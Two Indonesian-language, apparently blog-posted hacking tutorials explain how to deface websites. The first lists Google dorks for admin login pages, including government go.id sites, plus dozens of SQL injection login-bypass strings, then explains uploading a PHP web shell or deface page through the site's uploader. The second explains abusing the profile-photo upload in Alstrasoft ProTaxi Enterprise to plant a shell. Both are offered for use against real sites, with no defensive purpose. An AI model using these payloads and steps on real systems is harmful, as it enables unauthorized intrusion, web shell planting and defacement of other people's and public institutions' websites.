DEFACE BYPASS ADMIN

G HAXOR TEAM

   Yosh kita bertemu lagi dengan w Anonimokerl :v kali ini w mau share deface poc bypass admin :v seperti biasanya kita siapkan dulu syarat dan bahan-bahannya :v

Syarat :
-tamvam :v
-punya skill coli :v
-kesabaran :v

Bahan :
- Dork
inurl:/administrator/login.php
inurl:/admin/index.php intext:username
inurl:/admin/index.php site:go.id
inurl:/administrator/login.php intext:username
inurl:/admin/main.ph inurl p intext:username

inurl:/admin/login.html intext:login
inurl:/administrator/index.php intext:login
inurl:/adminweb/ intext:login.php
Kembangin lagi biar dapat perawan :v
Masa mau janda mulu :v

-script deface
-script shell :v (ext php, phtml, php5 dll)
-sabun yang bolong :v
-internet :v

Macam - macam kode buat logginnya neeh :V

‘ or 1=1 or ”=’

‘ or 1=1–

‘ or 1=1#

‘ or 1=1/*

' or 1=1

' or '1'='1'

1' or 1=1

1' or '1'='1'

' or 'z'='z

‘) or ’1'=’1–

‘) or (’1'=’1–

” or 1=1–

or 1=1–

‘or 0=0 –

‘or ‘x’='x

‘or a=a-

“or 0=0 –

“or 0=0 #

“or “x”=”x

“)or(“a”=”a

admin’–

hi” or 1=1 –

hi’ or’a'=’a

hi”)or(“a”=”a

or 0=0 #

or a=a–

‘or 0=0 #

‘having 1=1–

“or 1=1–

“or “a”=”a

‘)or(‘a’='a

‘)or(‘x’='x

hi” or “a”=”a

hi’ or 1=1 –

hi’)or(‘a’='a

or 0=0 –

or 1=1–

1'or’1'=’1

Langkah-langkanya :
pertama kita dorking dulu di mbah google

Lalu kita pilih salah satu site. Kalau vuln akan muncul kolom login, seperti gambar dibawah

Dan isi user dan paswordnya dengan '=''or' kalau gagal pake itu coba user dan paswordnya menggunakan admin
Kalau udah kita tekan aja submit
Dan taraa anda berhasil login menjadi admin :v

Sekarang kalian cari aja uploader, biasanya sih ada di gallery tapi beda beda ko :v
Kalo dah nemu kalian upload saja script shellnya atau defacenya, seperti gambar dibawah :v

Kalo dah diupload kalian cari aja file yang tadi di upload biasanya ada digallery juga :v

Kalo dah ketemu kalian tekan aja gambar rusaknya dan pilih show url lalu copy dan paste di bar url browser.
Dan tara script deface atau shell kalian akan muncul.
Kalau kalian tadi upload shell maka kalian akses saja shellnya :v

kalian tebas saja indexnya :v

Dan taraaa kalian udah berhasil :v

okey sekian dari w mohon maaf bila banyak kesalahan :v
Kalau ada yang kurang mengerti bisa tanyakan aja di coment :v
Okey

Related Posts:

---

DEFACE PROTAXI

GARUDA TERSAKTI 72

 

Yosh bertemu lagi dengan w TN72 :v Kali Ini w akan kasih tutor Deface poc eXploit Alstrasoft ProTaxi Enterprise.
Pertama tama kita siapkan dulu bahan-bahannya :v

Dork:
-     inurl:/user/signin intext:SIGN IN NOW
-          inurl:public/user/signup
(Kembangin lagi biar dapat perawan :v)

-script shell
-script html

Okey kita langsung saja ke langkah-langkahnya :v
Pertama kita dorking dulu di mbah google :b

Kedua, pilih salah satu site yang ingin lu deface :v
Kalau vuln akan muncul seperti ini

Ketiga, klik tombol create account
Lalu isi semua kolomnya seperti dibawah ini (isinya boleh asal ko, tapi email dan passwordnya harus benar :v)

kalau udah lu klik aja register :v
Terus lu login, pake email dan password tadi :v
Kalau udah cari tombol profile dan lu klik itu. Kalau udah lu cari tempat edit foto, seperti gambar dibawah ini, kalo lu browsernya pake chrome maka tulisannya choose file :v

Lu tekan choose file dan lu upload deh script shell atau htmlnya :v
Kalau udah lu upload lu tekan gambar rusaknya (berada diatas tempat upload)
Lalu pilih show url :v kemudian lu copy dan paste deh di bar link :v
Taraaa halaman nya berubah seperti script yang lu uplaod :v

Sekian dari w mohon maaf bila kurang jelas karena w juga masih belajar (noob)
Kalo ada yang mau ditanyakan bisa comment :v
Okey

Related Posts:

---